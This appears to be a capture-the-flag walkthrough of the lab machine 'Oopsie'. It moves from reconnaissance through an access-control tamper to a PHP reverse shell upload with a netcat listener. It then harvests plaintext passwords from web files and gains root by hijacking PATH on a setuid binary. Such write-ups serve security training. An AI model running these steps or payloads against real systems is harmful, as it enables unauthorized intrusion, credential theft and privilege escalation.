Oopsie

1. Reconnaissance

nmap -sC -sV 10.129.233.184

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Two services are running, so we start with the HTTP server. Browsing to http://dest-IP:80 we find an automotive company website. To spot directories and files that are not linked from the pages, we can proxy the traffic through Burp with intercept off and review the site map. After that we log in as guest and, in the browser's inspect-element view, set role=admin and user=34322, the user value that can be found in the account tab.

Hereafter, we go to the Uploads tab and observe that files can be uploaded.

2. Weaponization

  1. php-reverse-shell.php: to upload a PHP reverse shell, we set our IP address in the file. It is located at /usr/share/webshells/php/php-reverse-shell.php

3. Delivery

Now we go to the Uploads tab on the web server and upload the modified php-reverse-shell.php. To find the path where the file is stored, we use gobuster:

gobuster dir --url http://{TARGET_IP}/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

We find the folder /uploads/. To catch the reverse shell, we start a netcat listener:

nc -lvnp 1234

Now we request our shell through the browser at http://{TARGET_IP}/uploads/php-reverse-shell.php. With that we obtain a reverse shell.

4. Exploitation

Now we have a shell, but it is not fully functional yet, so we have to spawn a TTY. The TTY allows us to interact with the system properly.

There is a significant difference between the following concepts that we should bear in mind:

  • terminal = tty = text input/output environment
  • console = physical terminal
  • shell = command line interpreter

To spawn a TTY from our shell, we enter:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Because our user (www-data) has restricted access on the system, it is important to find a way to move laterally. Since the website uses PHP and SQL, we enumerate the web directory further:

cd /var/www/html/cdn-cgi/login
cat * | grep -i passw

Fortunately we find the password MEGACORP_4dm1n!!. Now we can check the available users on the system by reading the passwd file:

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

We try the password with robert, but it is not for that user. So we read the files in /cdn-cgi/login one by one and find another password, M3g4C0rpUs3r!, in db.php, which allows us to log in as robert:

su robert

The user flag can be found now. Next we check our privileges and notice that user robert can't use sudo:

sudo -l

So we check whether robert is part of any interesting group:

id

We observe that robert is part of the group bugtracker, so let's find any file owned by that group:

find / -group bugtracker 2>/dev/null
# 2>/dev/null discards the permission errors so they are not printed to the console

A file named bugtracker is found, so we check its permissions and what type of file it is:

ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

The setuid bit is set on that binary and it is owned by root, which is a promising exploitation path. Now we run the application to observe how it behaves:

/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 2234 # This is an example to see how it works
2234
---------------

The tool takes the user input as the name of a file that is read with the cat command; however, it does not specify the full path to the cat binary, so we may be able to exploit this. We navigate to the /tmp directory and create a file named cat whose content is /bin/sh, then set the execute bit:

cd /tmp
touch cat
echo /bin/sh > cat
chmod +x cat

To exploit this, we prepend the /tmp directory to the PATH environment variable (PATH is an environment variable on Unix-like operating systems and Microsoft Windows that lists the directories searched for executable programs):

export PATH=/tmp:$PATH

Finally, we execute bugtracker from the /tmp directory and we are now root, because our cat has been executed as root (remember the setuid bit, the s in -rwsr-xr--). The root flag can be found in the /root folder.